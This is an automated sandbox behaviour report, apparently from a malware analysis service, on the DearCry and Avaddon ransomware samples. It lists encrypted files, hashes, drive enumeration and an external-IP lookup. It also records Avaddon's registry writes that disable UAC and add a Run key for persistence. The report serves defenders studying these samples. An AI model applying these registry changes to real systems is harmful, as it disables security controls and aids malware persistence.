File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.Royale.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Windows Mail\wabimp.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\WindowsBase.resources.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\VVIEWRES.DLL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\weather.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\System.IdentityModel.Selectors.Resources.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\librawvideo_plugin.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Common Files\microsoft shared\Help\1041\hxdsui.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RADIAL\THMBNAIL.PNG	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts.css.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts2.css.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\VVIEWER.DLL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\FeedSync.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\PPSLAX.DLL.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\PresentationFramework.resources.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\7-Zip\7zFM.exe.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Network

N/A

Files

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml

MD5	0f96cefe93c14e6adece5ea787d35fb5
SHA1	3dfb1f74beab2ed12f2de06c0410e569058cb693
SHA256	748f3778ee8e6d99b6e2ad300c320383c83bc004e6b6cde2b89e522cf7143630
SHA512	6daba5b8440d657fb6fbf26d7c1fc276ae6511557f376c1b60f10b93e5978f5d3b2e610dd39ad298d7f78d78c31f048e818b6c3b2f195e5be903b65b9424fc29

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png

MD5	9a530c475ef73c5896d7c7f3543b1d97
SHA1	bc80f3430254af79f06be0d37d71cca604fccae9
SHA256	318cebc3c59b5327cfb7a69507f1dcbe92a15fc1abe429bf2359e0f9664d0b2d
SHA512	dc2da4492cbb7358ebddfacc246ff4bfc3a8b2fb3e76f47519a7e6ae47fce293607ab6980e64c0a5d4bd2687b2584fe6f4d85bb4888a11760aeb0d94e8246a1b

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml

MD5	0dbdc71d198cd2da4d8c5c38f44e66a2
SHA1	dab7e173502d5f80bc3177b0a480561b208eb1d0
SHA256	5ad2dac3e0044649be6532c957950483092115cf2992d170a98a123cc0af2818
SHA512	28506aced7d9235e3ed73e2afacc54834295818b571a7633ce8a72e8dbdd0debd225dfc307e10d82a082dac0da757a8ab6eaf5cea6b671fde4d03ead14d86b29

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml

MD5	794eb220b9c3fc6775b08dd9425c24b0
SHA1	99daf8158bd4914c06fc33302eec1d7f5897aa93
SHA256	40aa257d744c7d904e8f62392c91389cff523bae86eac46f075f79f6b67534b0
SHA512	c8d1f7bb4ddcd2c5c212eea495d776cda2fd1cc1d22e81c885bc45dfaca878b02810a0998c40ff861a8c78d52e7718444e046562c1e792590d881a1bb336ba86

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml

MD5	484651b39b9f0fc3ed8153db82b39eed
SHA1	859b44bdf204a55d21755358180adc62ede0e93f
SHA256	87bc15638540621224fcbd0f2fd0a73267465418b9b2897ea2fe5b977b990c35
SHA512	aac187baafb492a6930cebd87c41e67434bc40b724a844f3684f28b18846d01efc7f85e5fd0a017f1aceae341b616d2d925ec740039b17f01a9db1223972306a

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml

MD5	241e2f8d1c6df84c7de7debff798313c
SHA1	8d2f93801f8b0116fe159123faaf09d607eb1d19
SHA256	00fca714016de5a5b3207fb94fc30211cf745fd4b03c120862ffd88b5f024192
SHA512	11b376dc95d904b38bc541c26078b13843d632016e3b3bce3ff8d6315bf90d97b993d56fd76802e96bb87a3dbe1de3ebe92836d48aa35b2974785e9f69957e20

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml

MD5	b8e825d92d653fcf8f7dfb029406156b
SHA1	521f90b3653ee90e5b7b21a4732c7a8e2b2d9a92
SHA256	e9466955f535446cc4999e58805089c19bdd2cfc347519c912758cfc09e2564e
SHA512	059141bdc1e074bbbf7d43718ed5cb5ed2e4d663315f8433eb204ab083e6f9b43c4e84aec556cc190d59cd2dc1daa38343750cc18e45767de435230ecb1eaf28

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml

MD5	626282b09a4ad2e3debc34b0f723eab4
SHA1	2d6030babe784d001777aab4153415d991534689
SHA256	17a950101ceb4026932f7ff1902aabe83d835584d89081db151d72709333aeaa
SHA512	779e64f8a33388b0fe4c0627e9dc2b706b9d13ba3d54594bbe062d22f6ed1f04128ae3f0dbb32649052f1dd1e0aabf1c70b4db5a73816706753508a791dec428

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml

MD5	4e7c2b21080a655a39e47bd0e9949c43
SHA1	9b0e102fa821e1f48cdc31c533bccc5eebd4a54e
SHA256	b366b83f2732e1e45a454bcb03aaa49ba21b9b05e122a8adc88858fe540aef21
SHA512	1e5f51a49c3b56c22d8191dfccf8d53f24247870155c5e2864617d25d0bb4e3837a3927e7d1a056230b0eca0488e1c257c88f72da7c8ac962ae7482eb5d973a9

C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OfficeMUISet.XML

MD5	fb7745147a1e73eb393f50685ed0307e
SHA1	0bbcb4de1fd8f558dca370e149af99388ca6021d
SHA256	36c960255b56d99527c46d829df70f2df299344a6c91ea0df037502310275ccf
SHA512	95cee37c3492fef7d3e531f6bd265ee675f426f2ae756b10936e4f9c47ab2208bdc05fc7ec8d33c94aa17f585eab71c23f1e0e86fa46085eca7247a77f87eeef

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml

MD5	7e1c1eb317e359233365bd065bb5f9dc
SHA1	c887b29d543207b7677f53b9fb605750223456c1
SHA256	8d3f2dab5a480547e1f49f8ce3d9d876da1428527a472b58caba6f6b76962305
SHA512	d37b150d1e97a0ad62163af5082567900cc24a62d4e425e4ed44787d9fb195168666534df17a602d8214bc05c78ae58fb76cc9a255cfcbb544db51978ea882b7

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml

MD5	516e13b880044e4e84825e930da9e6ae
SHA1	680014911828b15dab0684b553dd0fbb0975f79c
SHA256	f59de0da569599483a5aae0f0c4f2d2c10d97576c261f15235fb3b880a12463b
SHA512	1e49c1e00206b85e61ac038aedadf43084a7406796e09f5d31130bf9be8f25fb68e96fff049cb81e3d593833d38b9b7409efe7e7550760c12ceb7ac6ea41ee65

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml

MD5	372e32c507fb0c4050e561d31f013b85
SHA1	2d9a6839875d126b9ae008f91b6c8031da6fddba
SHA256	bc10dcc05f8cf25e4bd058724739fcd1d43270c26be23642d9d3b159990d7cc2
SHA512	35664e1ac284308f7a826a2b230a9603595011f74e3440424344e4bcaaf1a4ae3726b4c378bcfadc5a6e85aeb6802948517f29d7375771666a3a1a38726e6dca

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml

MD5	09ddfc512856bcb18938b61214b6983a
SHA1	e61c11bfb814f6d49bcd42df0713e54df25215fb
SHA256	43de088d9626ed9eab5827f7149283986e6ca82ac1aac350c7e51764e256f696
SHA512	9f445aac5388548f329d2cfb96d3f29b282599d34722502f1774e1fff7758981622847653b14330a642a4458710e69e706ab83972567f9436cb40eb449137ec0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp

MD5	cb3156c7903e0763a5d5f7b2298e833a
SHA1	0e8de3ba01ea0d2a10f6e706232b509901ce8506
SHA256	27ea5deef122c356c6cf0758cedfb350c0f5a645afeb2e171dedcf7c46de3af2
SHA512	df4467362eff7a1aff1e4074e2e3076365c3d1cdc211c06d40a6af2ad012a899cede7cb79a4f1d541040df4adc285b1419ea756ed082502bd0190e0e421a4cc8

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp

MD5	bbf2d0e9eea1bc1e7c868ed7b1283958
SHA1	c2ab0419d8e59e56f5d36d66e10adbe8c7f79039
SHA256	ae40e84593ac3e961c0db15d5aee23ee54210d646a7786651f052371ffc38c87
SHA512	0f6ab7f9e7a0efec1c798072d979a98492ed8cd9f0d71637ecd42f138bb1de218f5d5f6c6fc94c2ca641375738f2a191c6c6486ab57d375d0a861472757a2d80

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.TH.XML

MD5	535616fac638a62e4a36c2bf2fcefd47
SHA1	cedbf3d4ef317151fcd9eb89ff106ca3699396d9
SHA256	dd40897f3c1ea3dc6e06f9507f151ef59879b730e8cad0cd58438fbeaad6d00e
SHA512	7e3019a87460f15b557a6c1cb0c11ea158d247ff21480d7a7db993d821e0a7ca2cbb425cbba0fe3d719be98b9c9a6e72dd273c5f4e8f53031e92d9ae0f462f4a

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AU.XML

MD5	d2f28dba18db15da8638c93a43c92078
SHA1	fdad7a7af03bb3419a24b09eb2826c3e75ada2fc
SHA256	673884634ba6c369d193c811e2ceb7f1a4d67a42d75fa3849de4438de990d5b9
SHA512	35c8e1b80401ace5611ce89a989ee25eca38901d7901c2a2b5a337abbca7ebf528fff9fcb6d2dab97820830e911961c15055ddc4b5b6482a55a445fccc46941a

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML

MD5	c889899deeed19310e5ac540f1596697
SHA1	198156431932d2bf8b79ed0c808f30d02ae4b3c2
SHA256	0dc572c2e972cd84a0c905026431c80004a0cced51a45ee1d2b48e25cbd627ab
SHA512	e901a26e68f675d19b7a607bd6b14b279cab391ad0c752b5c69581ad9b0f5817d3529b438dbeb5773a8b5ab0278bde90a4e7c37cf27e8accfe9c8de662e14ff6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\readme.txt

MD5	dbac9649c4bd702f55fbd1afafe87c44
SHA1	0d914f4a809cfe400ca111ebfbd0ad552d500785
SHA256	b9dfa3b30224bd5eef298531c945d5f2f6bb978b7ef42e5ef09715a535172127
SHA512	86d7786b400303b1fb722689aba7e8ef6a01ad7e2776194c5d545a7d7357dd91e7079296790587210683db7f4385f98f281272fd3d1ad6770dabf401709a6415

C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VUFNXJNN\desktop.ini

MD5	cb856e8bdfb00c240d43441aa7c62e9f
SHA1	d0c9def032806d32bc485ea5493e34217d5091c9
SHA256	f495547fca5a5a2c40dccebefe40160efb8bc2888e8afef712b096b5f2585b44
SHA512	770a9aa6e15da08da30c88a594ecdb1354cb5342b3b9da31abe6f312e3e31575b9e7748ac7227d6a1414c6bd7b66552d857bb1df302c848648557317852081ef

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xml

MD5	76fd968461edb535e6acfdf926cd1669
SHA1	77a81320a9c1b6a1a170118b1cf4ab80add44908
SHA256	d70aa8e79cfca04ee991d33a37352d66df118c720a3b80c58b8c3a54f2608aee
SHA512	fdf213bd15fbfce5365f73901781734942a711be8f3f590bff1091601dbc6c715c905f108b8c3f568e0d6c83028fbea077044a7cec054b675b63823847de8b91

C:\ProgramData\Microsoft\Windows\Caches\{FDE3500A-0F50-4FAA-BA86-4FFF44967453}.2.ver0x0000000000000002.db

MD5	d846dfbc02378d2abc6f1bfe15fcbb41
SHA1	7c2258eeef30b2332f8078443aaad2dd03330450
SHA256	3982088d0f4ad78ba7e0c2d55a171c42a95541e18fa8caddba0a43931aace384
SHA512	ba96848d686625b8045312390a164bca810383f5018221fd05892e5905f624d4ce2b0f98283fc7ca74c0b2f6ab65071efce31e96a54a552fc14dd9ec69284a9e

C:\ProgramData\Microsoft\Windows\Caches\{9FED6DCB-DE6E-41F8-8722-915F13FFDBB1}.2.ver0x0000000000000001.db

MD5	c20fc0a5bf22801a1e22a7433c66de17
SHA1	2f70426afa08748f631a0d1013cb5b3f88879e09
SHA256	116388fbca2c75260a350e2a7e23b972601a2efaa7db7d65d9859a9387ab5250
SHA512	bb3e4fe86f2c904b5834d5b265056dc4fe5c6c43ecbcb5c09cf74ee64b31558b3545c97996f4f69cc478f7aee5cdb53e730b6af3929bf1e0e964d925ce74051d

C:\ProgramData\Microsoft\Windows\Caches\{08FFC336-DA65-4831-BF00-38A2543C8681}.2.ver0x0000000000000001.db

MD5	3c6fcf1c23b09bf91e99d9080c6021b6
SHA1	c74b22dcdc9cd100c10742c439d0bb7c8588f056
SHA256	6f35a61fe7eb497dee36491fdb3f0e307a03e45efb762c9db852e466b9f55efa
SHA512	b54d40df82381c7e12e20391deabf1088716c38ec46b590c4c4fc77f79f6bbd49ec485c7981b38765a74d5ea25f6a49e6f1e9df5398ef3c72a458636a97463ff

C:\Users\desktop.ini

MD5	ace3165e852adb8aedbeda2aa3be570b
SHA1	4577ff7e92850e2723008f6c269129bd06d017ea
SHA256	237f73d46d3501de63eae1f85fdf37e65ddced70f013b7f178d1ee52b08f051f
SHA512	cf77563b9295b191ce2f309e03618d1ab4d317f65b87dbecc4904ee2d058db06d23c20c199571b0fafb67ae5ec5166b76af0b7d8bfe3996b0dde9751e28f8c03

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

Signatures

Avaddon

ransomware avaddon

UAC bypass

evasion trojan

Description	Indicator	Process	Target
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Renames multiple (169) files with added filename extension

ransomware

Adds Run key to start application

persistence

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Checks whether UAC is enabled

evasion trojan

Description	Indicator	Process	Target
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File opened for modification	\??\Z:\$RECYCLE.BIN\S-1-5-21-47134698-4092160662-1261813102-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\W:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\Z:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\B:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\J:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\L:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\M:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\P:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\V:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\F:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\A:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\K:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\Q:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\T:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\U:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\Y:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\H:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\I:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\N:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\O:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\X:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\E:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\G:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\R:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\S:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Looks up external IP address via web service

Description	Indicator	Process	Target
N/A	api.myip.com	N/A	N/A
N/A	api.myip.com	N/A	N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
